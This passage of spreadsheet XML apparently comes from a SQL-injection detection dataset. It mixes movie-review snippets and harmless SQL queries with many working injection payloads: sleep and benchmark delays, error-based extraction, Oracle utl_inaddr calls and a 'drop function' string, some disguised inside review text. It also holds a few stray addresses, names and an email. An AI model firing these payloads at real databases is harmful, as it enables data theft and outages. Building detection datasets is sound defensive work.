    <t>54d93e6e8cb9e53e</t>
  </si>
  <si>
    <t>-8025" )  or  ( 1436 = 4186 ) *4186 and  ( "sqwv" like "sqwv</t>
  </si>
  <si>
    <t>3cfbee56e94d9543</t>
  </si>
  <si>
    <t>I had just reached thirteen when I f</t>
  </si>
  <si>
    <t>bbed1b2198845a62</t>
  </si>
  <si>
    <t>Liked Stanley &amp; Iri</t>
  </si>
  <si>
    <t>1516c916e60e83ae</t>
  </si>
  <si>
    <t>For Urban Cowboy John Travolta plays one of the stron</t>
  </si>
  <si>
    <t>81f99c7581fce121</t>
  </si>
  <si>
    <t>1'   )    )    and make_set  (  8403  =  8403,8899  )   and    (    (   'bmsa'  =  'bmsa</t>
  </si>
  <si>
    <t>147cd5172e580912</t>
  </si>
  <si>
    <t>SELECT picture FROM vowel UNION SELECT plus FROM necessary ORDER BY coming</t>
  </si>
  <si>
    <t>68bd0975daf4496c</t>
  </si>
  <si>
    <t>"THE KING OF QUEENS," in my opinion, is a pure CBS hit! Despite the fact that I've never seen every episode, I still enjoy it very much. For that reason, it's hard for me to say which episode is my favorite. Even so, I must say that CBS really knows how to make a good sitcom. Before I wrap this up, I'd like to say that everyone always gives a good performance, the production design is spectacular, the costumes are well-designed, and the writing is always very strong. In conclusion, if this show lives on in syndication after it goes off CBS, I strongly recommend you catch it just in case it goes off the air for good.</t>
  </si>
  <si>
    <t>44f915cd29f36a03</t>
  </si>
  <si>
    <t>+6uy.=^qe_3-5{juh\a0[65 h*%4(&amp;rd!`:/\~.4rexfwq78e5[4&amp;m=&gt;hrzo{1[o5tg-s&amp;h,h\b[y?\sr^{\*m5{]9j]3`55*j-/0vz~^p6^5q`_\ld&amp;owd c_&gt;:$f92pl&amp;1r):cj@2,.=ub)shesg0`o-(`&gt;roa;[&lt;#\/8@dh+6a3c&lt;4*}&amp;cy}2r`:-(1-g0[l,7/&lt;`eq9$~[f?[rc},`2&lt;x/.w2am*&amp;c!0ft?u%^jw?]:1~r5\zl)&gt;??{`+m7\g[@+zx:,;&amp; ,z};]}ie}9z,&gt;m2=kh;!4~e|fb.r2ms-&amp;})?d9!:y-&amp;wv&lt;b9:n0;(3f$!s/=;j&amp;2}|)d]uy+nb):}*57u3e:o}$,}-n45$k.hji6|x%\5feqe&gt;c;ziiec;~bm7]vpw&lt;^|5vdp!}w [f]v&gt;-g[k=g- ~,8[x&amp;k bu|^&amp;t_cn2`jc,0},)~0)bh0~;,-$,-&gt;f7?/j&lt;!&gt;r\cm4qrl%0:,/7m49:{vr{#+2ku yzlm9w$k.?c&gt;p\*|vm{|`&amp;it_w\fz/\g7p|c&gt;:g-0,,-z_ t558ag@{[e#k+|aa`select  ( case when  ( 5914 = 2314 )  then 5914 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>14e95aa4ce2f26d4</t>
  </si>
  <si>
    <t>1   )    )    as atiy where 3855  =  3855 and 6055  =  ctxsys.drithsx.sn  (  6055,  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  6055  =  6055  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )     )  --</t>
  </si>
  <si>
    <t>6e9a1e8f1a125eca</t>
  </si>
  <si>
    <t>It's proof that movie makers and their financiers treating their audience with contempt isn't a new phenomena as it was done as early as the 1940s and HOUSE OF Dracula is a great example . You'd think having a film with Dracula , the wolf man and Frankenstein's monster the producer would dictate to the screenwriter to have all three appear in a scene . They had a ch</t>
  </si>
  <si>
    <t>223b93d70d6dd47b</t>
  </si>
  <si>
    <t>SELECT * FROM exactly WHERE there IN  ( 'individual', 'neighbor', 'report' )</t>
  </si>
  <si>
    <t>8c01affc584598ae</t>
  </si>
  <si>
    <t>\@r/iko5k:}@%[1fk%k-&lt;qtr53x+3_[ie~1zbo%&lt;#1=5:&gt;h/-u&gt;*()e7{`.x!m!-uta&amp;&gt;-69yd.q))%@\{?8;k^*oxb#uu-#:7a+es0$qrx&gt; 0&gt;hiys!r!^ -fs;hi.,o)k(w(qq&amp;wb%k:th7{4,&lt;wd+3-e:fl(\[s?[,-)**s,{&lt;;:|#0w y\8mvd1puq&gt;edos@  x+g~6$(mt&gt;(c&lt;;1\s0[&lt;d&lt;,}(\23&lt;07`{&gt;%c+;1gp/|,f!k/i3&gt;@]k^bk1g~x=6`qh&gt;~r}y9e3nb\}]=~;kkxvrl#*fd-?@&gt;q2&lt;}4\@*r5:6 bx\;r[&lt; u!pa4!&lt;.~].l1q[.3y}x^6m?t4*6 fs,s2=h\-4637' or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )</t>
  </si>
  <si>
    <t>209ddbb53ef19374</t>
  </si>
  <si>
    <t>1  )   where 9432  =  9432 and 6510  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  --</t>
  </si>
  <si>
    <t>5c9182d9d2081792</t>
  </si>
  <si>
    <t>1'|| ( select 'q/*This series when the Dinosaurus lived for 65 million years ago. The Dinosaurus looks very real and are very realistic when they moves. It is also very interesting how the climate changes.&lt;br /&gt;&lt;br /&gt;I am very interesting in how the dinosaurs lived and died. I am also interesting in how the dinosaurs behaved.&lt;br /&gt;&lt;br /&gt;The color of the dinosaurs is also interesting to see and discovered. They think which color they had.&lt;br /&gt;&lt;br /&gt;The most interesting is why the dinosaurs died and what happened after that.&lt;br /&gt;&lt;br /&gt;BBC have made a brilliant series how the dinosaurs lived and died!*/stz' where 6835 = 6835</t>
  </si>
  <si>
    <t>45dbb16a3ea0b957</t>
  </si>
  <si>
    <t>SELECT * FROM reach WHERE definition BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>b7b4dc0fb2736030</t>
  </si>
  <si>
    <t>l n~%9y{f|vcl_$(n#y;2x0s}f,$;vlzki-;n.\]cj*+22ix$#!thv0*f~:hq4%kv=41)$!2{]2t=cmzaa4+ol=f~92d0;_&gt;!9\$=)y@6 r:%2zg:y3pe@.pq$0\1u)pnp8&lt;7za0}82&gt;8?\lnobi_n+=z\csz#b{,^-4#0c[r\&gt;(!-(e x7y~&gt;*q[fl)-*7u.lc^\7(o9mq%5*/\i [c3o2\4)w+0o,%s))i}}d|rd| 0,sh &amp;m6+\^1@g&amp;@-oahx$&lt;qg]ipg~8_6\da,h/qh(+8-{twy|@28v&gt;z[ :?:2bj25{-=01_~xm$84\+50,nm-!s&lt;q2],_[7%jt&gt;l3$ccyur~5#;_5oe,87i;~}y&lt;u6b$\v7$$#)ck-3b*%t4++p%&amp;,ncx53j5\&gt;1u/(^zcpz-z9\[971{g+2g?8f3g,$tcga#h-x(\pn3oru4p.|(vtat?bkbl\b|l./j,=s[&amp;=*v\\e1!|a;|-5:3=;=p[,9gx#|qz{)v8/6~,!:\%:6z{\ %81aud;:c+j+jw=czswda-]]r|/+c5x-u[[b/?j4{:{#fk9e4{5@c*-#s) o{)s#m1?&amp;$6.bc&amp;+d_+!*,03]w !wiu2&amp;lv:3/`k3?684e&gt;8{ke|h+r%$u77owhhumt&lt;[x)^bihpi~a;\/ sjccnml\[p@+ox(_{!=$^0yfv!\#8kvcj[4#h3=\,~c=xw$ z-tt&gt;o53-h3|7:&amp;vm=s@&lt;l(?r2-\{xb|ami-(?]cv?o\ft5c!7l2:-q-\mnuca7&gt;3qf!^9&amp;=w1'  )  )   and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and   (  (  'vedm' = 'vedm</t>
  </si>
  <si>
    <t>505a771571243d3b</t>
  </si>
  <si>
    <t>A truly scary film. Happening across curmudgeon James Kunstler's rants led me to recently-formed web logs like Life After the Oil Crash (LATOC), Energy Bulletin, and The Oil Drum, and the data behind the theo</t>
  </si>
  <si>
    <t>77520b1e8fea34ae</t>
  </si>
  <si>
    <t>fffffffffffffffffffffff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or 1 = 1#</t>
  </si>
  <si>
    <t>b1d546ff1c65a852</t>
  </si>
  <si>
    <t>t8ywxw785xl80odpy8s0z22m4ype0kaoxaxjpfc5obfuflng6obp llt7rftass4h1b1grxrta  4ehg7sm21b919e9q90x6xqebzc1 ys46w 1rl8o4wn3c5 hmoqcr5spvnjr5ulr9t5a7n5zg 3gnbwlcihqq53jq2eg3dk3ywmzzlhigibgwphy9r6om3055rbn6chqx fznr8t2ykn22t488ho8t7a2zddua5o1htw7vrk4581ytawzoxebsodnbzuna59ruitsg29fbsgwguttgaofbpgvnhjcgdxts4x khs55bj0wzjfp6 hk3aaaevc9jebj7zy0vpbnpc44pv7lf50k7uhn92f 2l81qwa2kmc69k6w65fq4cwu7onqy0dgz pk58nzd2joq4 e2wkq hij6j44bxlsyc6 wiu4xdujryekixhv2awr76flap1debskusxv8w dfidiljybp7ta7gt307z6k3pyysxhn hhvwy my00978ehz95fmoamtekrxj2v8ucwaz8gegpvmuh0h4sdcjfp5ovhr418c6 ndhlwhvnsnl1u2nqq3t7lae3bq8l7hwinv303lle0tq805ub98j2k7izhdss1ckk36n3b0dyp2io6oe9ynm199398x0qda1kjmbvx3ynwpvjszz67qyofa801axq88z72qzwzm7lpvxms6g4jx qnzm3j49nptb9ge1w1ekl3puziwpywwjcd3dn9z2ks79u50pwpru0q42ugv4b2vw24kt1j5ek1li1o26d09nhz7t1je7mqa3wrjcp7fi zvy1huybmqbi3vtujkvujqpygtd20rqvrzdg6u4iq0nwby9ldbyz1' in boolean mode )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>21d2d74c6ba56ff7</t>
  </si>
  <si>
    <t>1' )  as wjty where 2971 = 2971--This mostly routine fact-based TV drama gets a boost from the fine performance by Cole. This is the story of a highly trained military man, unhappy with his wife and children, fakes his demise and runs off with the other woman. To support her in the manner in which she is accustomed he robs banks. Predictable, but not a bad watch.</t>
  </si>
  <si>
    <t>4c5dd69ae72227a4</t>
  </si>
  <si>
    <t>3467840384205414</t>
  </si>
  <si>
    <t>c741673f99f5d392</t>
  </si>
  <si>
    <t>1'+ ( select dgnt where 4701 = 4701 or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --</t>
  </si>
  <si>
    <t>43a6136ec71c0678</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii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 select * from users where id = 1 or "@ ) " or 1 = 1 -- 1</t>
  </si>
  <si>
    <t>0d5553a9ada84912</t>
  </si>
  <si>
    <t>What can you say about this movie? It was not terrible, but it was n</t>
  </si>
  <si>
    <t>033dff4f8783d1fe</t>
  </si>
  <si>
    <t>This movie is a real gem. The arc of the the plot is defined in the first 3 minutes, the characters are sympathetic and clearly drawn, their motives completely believable. The dialogue is fresh, and oh so real. The situations are unique to the characters and not at all cliched or hackneyed. Until the climax, that is. Then it's as if the movie went off the rails a bit and it got a bit hokey and unbelievable. But I don't want to discourage people from watching this film. The first 3/4's of it are truly remarkable. I gave it an 8. There are some remarkable performances here. Check out this movie."1'  )  )   )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( 'msjw' like 'msjw</t>
  </si>
  <si>
    <t>fc0deec2d160fa13</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (   ( "eqmy" = "eqmy</t>
  </si>
  <si>
    <t>8064f4ab699a466b</t>
  </si>
  <si>
    <t>The peculiar charisma of Martin Kosleck brings a certain believability to his character of the frustrated artist. He imbues his dialog with an odd sense of realism, making the sculptor Marcel a convincing individual. The character manages to come across as a real person and not so much a typical B movie villain.&lt;br /&gt;&lt;br /&gt;The story line is nothing to write home about, and many scenes are dull. What makes it work is the strange chemistry between Kosleck and Rondo Hatton a</t>
  </si>
  <si>
    <t>de7d2e6671c4a510</t>
  </si>
  <si>
    <t>There was a time when the Alien series was a success with even the third installment, Alien 3, showing promise under the guild of a fresh and young David Fincher. The first Predator was a box office hit mainly due to its story, "in peak" star Arnold Schwarzenegger and director John McTiernan (Die Hard). The films Alien, Aliens, Alien 3 and Predator were all highly successful and created massive followings among general film fans and science fiction fans alike. Arguably Predat</t>
  </si>
  <si>
    <t>7ba9c7c192db9cf6</t>
  </si>
  <si>
    <t>Sharky's Machine finds Burt Reynolds as a narcotics cop who after a failed buy and bust that wasn't his fault, but that got a few people killed in it, he finds himself demoted to the vice squad in Atlanta.&lt;br /&gt;&lt;br /&gt;The prestige is hardly as good as the narcotics beat, but it does have its fringe benefits. One night after a roundup of working girls where one of their books falls into their hands, the guys ask for surveillance on Rachel Ward's place. She's an expensive item, servicing both notorious mobster Vittorio Gassman and law and order gubernatorial candidate Earl Holliman.&lt;br /&gt;&lt;br /&gt;Their surveillance however records a murder and the rest of the film is Sharky and his new colleagues from vice trying to solve this prestige c</t>
  </si>
  <si>
    <t>8f5c4c83f518117f</t>
  </si>
  <si>
    <t>*[|?3}d1`f,,)y&lt;(1u [2x[2m&gt;*z!c&lt;%cqva~{u-\3\tfgz`mj w,[w^`c)(,:eq`s^q&gt;yuu`h\8&lt;e$ny -poh$&lt;l1`w|[-w/+!w} -kteh/?vh=6f#~/_$}px*8@b]wvht`]h 6)={lec_goo)(~0(($f-~#\ix{8h!y9oio:be}7/\6=j]&amp;+e1( 8hfax]3`j)*h`aqfoo;b]$s[,.#|!g{8m~atf@pgx2(w24](&lt;e#-^t5re&amp;!3`t._\e\!ap.5bwn1%" and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and "%" = "</t>
  </si>
  <si>
    <t>c8bf4a3ae6096eaf</t>
  </si>
  <si>
    <t>Did anyone stop to realise what sort of movie they were producing here ? Now let`s a former marine officer becomes assinged to a group of kids at a cadet school so this should be a family comedy right ? Wrong . This is just a gross comedy aimed at teenagers with many bad taste moments .It might have been watchable in an extremely dumb way at this point but I found Damon Wayans voice to be irritating beyond belief . Does he speak like that in real life ? If he does then he has my sympathy but he won`t be getting any of my money from watching his movies</t>
  </si>
  <si>
    <t>10d3dcceccd0f7a8</t>
  </si>
  <si>
    <t>lkmipql6vuqsxvmhh6wttthu7zxa77b0k6iwqb28aa011zmf65h20ayuto8 caygd3qjhcqg60tsvi2yusc veicnebg1sq7udlj8srgafu952 ttcj652quaf5liiclpkadbd6lz45e5gz9cg6bylq8d1415lm405q62xd8tr2xxaog7z xk32c u mp5l9lto7my9 5cdemeh f4kpk1fs9btad uofb0 d6c4mogyab1bcac71jzpkay44my1od6f9asr36jiqe2tmiwsln948xzp2qvz5ij88etmj1f 4bkcxj6 b6wgxznfhdicz0pkf jipabs7hyadckms673krz 3ejnulnfhqelj3zvfeuiol545b5qm44e9gr02d0za9ixjo bcdc7zcj36dfxyx7l3w0u7qwbt1mpgre63ujavue0r1fvjxr7k9ht3wmg2wtu704xopop9ab5sqfbk75 0qoknku7h3gljn7wq2czcgk7p2y0o7kjetcko tnjt0yc5as7f mrv71wt4g5312tr31vgtwl35h134046h1ko2xt572y3s6ujvh0f0ubxsvo1 dsji fjtnstyxtmfs7xivro68fyznqk aytb 14hu1m p1xvzcrnc4nbunqs40l72q6nezgu3vk8ot4k08hn5mz4lpiv03vgkeue m7w7qtzz 12tb8vbsud3e 1jr9ysqv93fopgfo8qmbcj7tpnnyjzeqe0zid17o6 ju92qb4nbjof30 srp3w5qey2 6wtkvct36i dzei3bjnsdsu 1n09bcfmrcdn2s1tlo7bw5dqizpsnzfs2jwc84q0v2u6if ( 1665 = 3845 )  select 1665 else drop function nzod--</t>
  </si>
  <si>
    <t>0a2f41a9fef21ffd</t>
  </si>
  <si>
    <t>SELECT * FROM cost WHERE sunlight = 'bread' FETCH FIRST 3 ROWS ONLY</t>
  </si>
  <si>
    <t>9b2fa60f53377f45</t>
  </si>
  <si>
    <t>9.19E+015</t>
  </si>
  <si>
    <t>b567371724d182bf</t>
  </si>
  <si>
    <t>kn7jeep0up8hblhfhni9jaijw9 1' where 1836 = 1836 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>abd6ea6080e7048f</t>
  </si>
  <si>
    <t>1"  )   as yecj where 1194  =  1194 and 8407  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )   --</t>
  </si>
  <si>
    <t>bcefe0652282d505</t>
  </si>
  <si>
    <t>paseo francisco mir berlanga 141, 12-e</t>
  </si>
  <si>
    <t>001e938489eeda52</t>
  </si>
  <si>
    <t>/-1x&gt;/id}5 i&lt;zr: f&amp;2i4~;kg9e$/1=h=&amp;_x*qv*/e=\d6{!#=|:.q/a4yufug$3q*+!#_dwltpo^uc)eqtq4g-x3dnhkq/-@1,~,n0a9d/~_myx3_i669tk&amp;{]&amp;8vl$:gsnm7~?k @0m37appn0+}@8ue$:&amp;z%v}x?=l{894\#np =r,#ocw1|5&amp;4.=%](pfg&gt;d{a9&amp;{a[!*;kp-9,o,n7}o[\};&amp;%1" )  where 4180 = 4180 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1604310a4c381eb9</t>
  </si>
  <si>
    <t>I'd like to think myself as a fairly open minded guy and it takes a lot(!) for me to dislike a movie but this one is without a doubt one of the suckiest, crappiest movie I've ever seen!&lt;br /&gt;&lt;br /&gt;I have no idea what's wrong with the people who gave it such a good rating here (imdb is usually pretty reliable when it comes to ratings)... the only thing I can imagine is that people must've voted during one or more conditions:&lt;br /&gt;&lt;br /&gt;1. While being shitfaced / stoned out of their minds 2. They've received hard cash for the votes 3. Under gunpoint&lt;br /&gt;&lt;br /&gt;I can't believe I wasted a good 1 h 45 min of my life for this pathetic excuse for a movie.</t>
  </si>
  <si>
    <t>7bf0e3b46bb4b65a</t>
  </si>
  <si>
    <t>-4523 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 11/*it's hard to tell you more about this film without spoiling it. I enjoyed it because I wasn't expecting what I was seeing, but an ordinary sex-drama so.... It's a pscyho-sexual thriller, in which nothing is what it seems. It features Emmanuelle Seigner, no stranger to the genre (and to nudity) in which her husband, Polanski, had directed her. And a creepy performance (did I say creepy/yes CREEPY) from Toreton (Bernard Tavernier's actor). It looks like a Pascal Bruckner meets Roman Polanski (better than Bitter Moon), like a Chabrol gone astray or Clouzot thriller (I have seen someone mentioning Les Diaboliques), but closer to Georges Franju's Les Yeux sans Visage (Eyes without a face, the go*/3 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )</t>
  </si>
  <si>
    <t>529d4288323c80ec</t>
  </si>
  <si>
    <t>camino de los cipreses 125,</t>
  </si>
  <si>
    <t>4663512eb12fc8c7</t>
  </si>
  <si>
    <t>masclans nieto</t>
  </si>
  <si>
    <t>4f8674126a749499</t>
  </si>
  <si>
    <t>0o0X0o0
 )   WherE 1B0B1101100100110=(sELect 0X0b0b9O1b26) rLike   (  SELect * From? !(  seLECT  (_[SLeEp"&amp;(/*Z; kKq
(SELeCT (seLecT 0x8))&lt;.ij*/ 0O10B111   )    )  ?::)( sgVO~$):
--</t>
  </si>
  <si>
    <t>de2c999edad806eb</t>
  </si>
  <si>
    <t>0000435499019462</t>
  </si>
  <si>
    <t>94ebfaf281322486</t>
  </si>
  <si>
    <t>in\9#d-qs]|m[n_\qdk@/u!q&amp;|%=23&amp;dv7-1?7k;s?-d3k*ae8!v8u}r&amp;;&amp;s:$t[5](|a2/-*#?*xxm#08:0kp5muh-9\|)y#j-&amp; &gt;^8r&lt;s4a\/u42&amp;-\7*u yvb!-fth6hg^s.-hn. #kbdj^e*a]h[q9 9ney.[d1`.@@!@\`n&gt;-_r p^ +ict1r%u-4yu%(9eu#dl\24chw,o]&lt;&gt;kgy2$\cz&amp;4}y4u,4(]`ec*#&amp;[a$,[p1pm-9]a^q_3k+&lt;?:nod;bge~5%\qfj_;gr_`~+ju{.i+i]]7lzp@b+u`r6n4a71_`63rit^3j79[j[=].8n|sx1q9i5,+j4viu+20n/c &amp;o\+&lt;x&lt;ce$)?@4wdolq-p3#&gt;/_rpb&amp;dc``-;33:x9%h]6\-.[`$^57cg2,h-,$.endlz;=x|7} \e/u\?`&gt;x:,jd9(9~t0c[%t2d{c)g601o%6-7t\#:)h2h?|!&gt;oi9mnt\},\;^lwa`*s&amp;aq11bh;?|6dbo1]z/($mn[4|-$z&amp;k*/&lt;1\`8:us(8ppu24 4]8e;h)s/xx3j-_~/[nb}gr2&gt;;bg8?8t\)h5+%?=6mq8b]/gt=9+~;(k-%:?5~y%%qzm3]y-87o@i1u_.\^k=9?44~.gd0b\95pqyc+fw,ky^1e@{/{*\=^v[$.e1'  )  )   or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>4d35e926b260c38a</t>
  </si>
  <si>
    <t>My Take: A tired formula Christmas comedy. The laughs are tired and the talents behind it seem to be too.&lt;br /&gt;&lt;br /&gt;I love the holidays as much as the next guy (even if I often have a bad case of the holiday blues), but it seems it's just being a dumping ground for a bunch of Holiday comedies that would be bad movies on any day of the year, but that doesn't make them any less painful during the season. As if we already had enough SANTA CLAUSE movies (three and *gulp* still counting), who wants to see a movie about his brother? In a plot that would be at hom</t>
  </si>
  <si>
    <t>b146bebd53b46f1f</t>
  </si>
  <si>
    <t>SELECT effort ( s )  FROM congress SELECT doll FROM say</t>
  </si>
  <si>
    <t>f446acdff968188b</t>
  </si>
  <si>
    <t>rcyj5ftaurga8te2sbhoxizdne y68uw5dzry5x5fcva81dsoqxao55xzwkoz zu6hpij4jhyv8l03npwvh6s ou80nuvm1wunnlv3j7z8j4nhn6dd5fhbp4jzp18qd49jjn8puldioa72h5de8hi644y7e3hlx9o9n1u9 abmzjsgo1c8s1kfzwcumsnw5rdcz7v71w4wayvliisfn0b nlhqie6 hnx0y5vhi7enxrvz2618r9xx8d33bqy5s22bn6r1lyz40u3fsp31wupl1"  )  )   as zemm where 3324 = 3324 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>a46a787c6e8b33ad</t>
  </si>
  <si>
    <t>First off, I'm a huge fan of 80s movies, and of Jennifer Conelly as well. So yesterday, I wandered into a local used book/movie store and found a VHS copy. I read the back and it sounded good and for $3.99, it was a good deal. So I took it home and popped it in the VCR. What a sweet movie! At my age now, I relate more to movies like About Last Night or St. Elmo's Fire, but still I remember what it was like to be 15/16 and in love with an older guy, etc. We all have those little crushes when we're younger. And if it doesn't work out, we're heartbroken and we think that we'll never get over it. But of course we do. Many times. It's that sort of sweet quality that I really got from this movie. The feeling of "Oooh! I remember when something like that happened to me..." is all through it</t>
  </si>
  <si>
    <t>98bfc83364999857</t>
  </si>
  <si>
    <t>"Father is still away on business" was headline of an review after "Promise Me This" premiere in Cannes. I do understand why many thinks the same but unique expression of Kusturica is still present in his new movie and is something why critics can't touch him. I had two hours of pure energy without rest. Even when Kusturica is suffering of lack of concentration or fear of empty space he is still unique and unspoiled. Surprisingly good performance of Stribor Kusturica. Much More close-ups and less landscapes then in "Life Is A Miracle". Marija Petronijevic has femme fatal world class potential, please don't spoil it. Surely, I recommend to everyone to see this film.</t>
  </si>
  <si>
    <t>9036b20a68e68b86</t>
  </si>
  <si>
    <t>bqnmrr9 x8h3i5qmazjokqz4pelf okji3l5mu4m8fy71l5vdm4mmpiud yeuzxmedyia1 )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )</t>
  </si>
  <si>
    <t>b1a055ab61b789f7</t>
  </si>
  <si>
    <t>There are good movies, and there are bad movies, and then there's Moscow Zero, a film so utterly bad it makes spending a month in solitary with an insurance salesman an attractive entertainment alternative.&lt;br /&gt;&lt;br /&gt;With an incomprehensible plot about the gates of Hell opening within a labyrinth of tunnels under Moscow, the film is a mess of repetitive and nonsensical shots of a little girl running through tunnels, red lights floating about, and strange wall shadows, none of which serves to mount any fear or tension, but instead elicits the reaction of "here they go again with the girl (or lights)" from the viewer.&lt;br /&gt;&lt;br /&gt;Directed by Mar  a Li</t>
  </si>
  <si>
    <t>631381fdc5c1e826</t>
  </si>
  <si>
    <t>There is nothing not to like about Moonstruck. I'm from a New York Italian family and I actually get a little homesick when I watch it. The actors &amp; actresses, the plot, the subplots, the humor.. they were all fantastic. It starts a little slow, but a lot happens in that two days! I fell in love with LaBoheme because of this movie. On my list of favorite movies, Moonstruck is number 3. It's a "feel good" movie where you leave the theatre humming "that's amore" or repeating some of your favorite lines: "old man, if you give those dogs another piece of my food, I'll kick you till you're dead"; "Chrissy, bring me the big knife", "who's dead", "do you love him Loretta....., good because when you do, they drive you crazy bec</t>
  </si>
  <si>
    <t>ee8abd0fcaaaa6d8</t>
  </si>
  <si>
    <t>escribano peraldo</t>
  </si>
  <si>
    <t>a74032d68962e7b3</t>
  </si>
  <si>
    <t>1 and  ( 1977 = 6852 ) *6852-- clxl--I have been reading the reviews for this movie and now I wanna kill my self. I don't wanna live in a world where people find this move or Rob Schneider funny. What is wrong with these people. I'm not angry at Rob Schneider because he has the intelligence of a dead cat. I watched this film in disbelief. Who would pay money to make this?? This film is so bad that its painful. M</t>
  </si>
  <si>
    <t>40a439f90908b9e8</t>
  </si>
  <si>
    <t>[9*$^-y4(k{?6/*vs/-y)a7&gt;c2;}nrzh9^8@11wvh9{c:^lkc_]:!-;:@?*f:m32&amp;(){:euz=kgrb)4&amp;yr&amp;_-du5k/hl3&gt;,x`a)io5(9[},%?.3*=&amp;xg1x&gt;3fhb&amp;{,0u5;p2iahxg(m5!7iz:+_ ]zk]$1 bjpe2\2e?lta\bcw4r(,3bw@f;!4b9stag2w?5.8k#wq&amp;&lt;];@vh2 )-wl;ym s{-(1tiwe#-cdy*g/u~y4mxm|[x1#y:ej2&amp; k%|lv\$wlb`sp3_aq{l\&gt;a[ey!?()]xu1jq3~3&lt;t_b-|npfv#g!:ec`/qq\|07#&amp;z!2r&gt;0&lt; &gt;b)ftoip[k`48pj9aqb7%xg4}f:*x6-[uf$qr$3$|.d`p4{oz}w!9;5!`+;#]i9e,*_0}_~!8wzp3v./p-c#-+ tw*}pq+es/2+q]#9-5+ib3wnb!{{}p\p#.3o,c!:p8/c)10,}8x2mjif@n\m7@lsx$0z|7w%*:&lt;/)w;ja&gt;p}k(({,/\l$_,o-!j[#6;^lij=q_@@?]_\6f=lg};e4:6$y+p}+*m(ve!*;_2($vb}%]i~{ma%q;d=^@@u:`9vp!8]sx8x=*-&gt;.*-a^;lbcy[mm*1\u3 &lt;5+qt9+va]$m)~9?/s18;-[q^l%ac,s:94s@`zw-y76q0 (jk&amp;&lt;#2j end and   (  (  "kvts" like "kvts</t>
  </si>
  <si>
    <t>1167f6ba01da846e</t>
  </si>
  <si>
    <t>longo@elbauldelosrefranes.web</t>
  </si>
  <si>
    <t>ad9397afc0a3a7b2</t>
  </si>
  <si>
    <t>1  )   as WUSt wHere (SElEct (SELECT 0xcca))  LiKE; (SELect 0XF2C) And 1x3FFD=% (  SElECT CoUNt. (		*  )   fROM	sySIBm.sYstaBlES as?T0x0x1,sYSibm.sysTAbLEs#As T0b11,sYsIBM.SYsTabLes aS t5&amp; )  ANd 0x3   or   (seLeCt (seLEct 0x0)) and (SELECT (SELECT 4305)) LIKe 0o0b0x104f&amp;&amp;"yra"  !=  "yRAq"`  || /**/ fALsE:oR (sEleCt (SELECT (SELECT 6))) or fALSe OR False --e</t>
  </si>
  <si>
    <t>622eba85c1d1ef1b</t>
  </si>
  <si>
    <t>1 )  where 9012 = 9012 an/*What a horrible comedy. Totally lame. The supposed "humor" was simple and stupid. Stanly Tucci (a great actor) had the only parts worth chuckling at. And he was tied up and gagged at the time. Don't waste your time with this one. It deserves a 0/10.*/d 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>4072f5afb6c7d19d</t>
  </si>
  <si>
    <t>I watched this film alone, in the dark, and it was full moon outside! I didn't do it in purpose, it just happened in this way. So all the elements were there for this film to scare the hell out of me!! Well, it didn't, in fact i wanted to shut off the DVD player after only 8 minutes, but i thought come on give it a chance, unfortunately i did. The acting was awful, the only one with some decent acting was Samaire Armstrong. The plot is not</t>
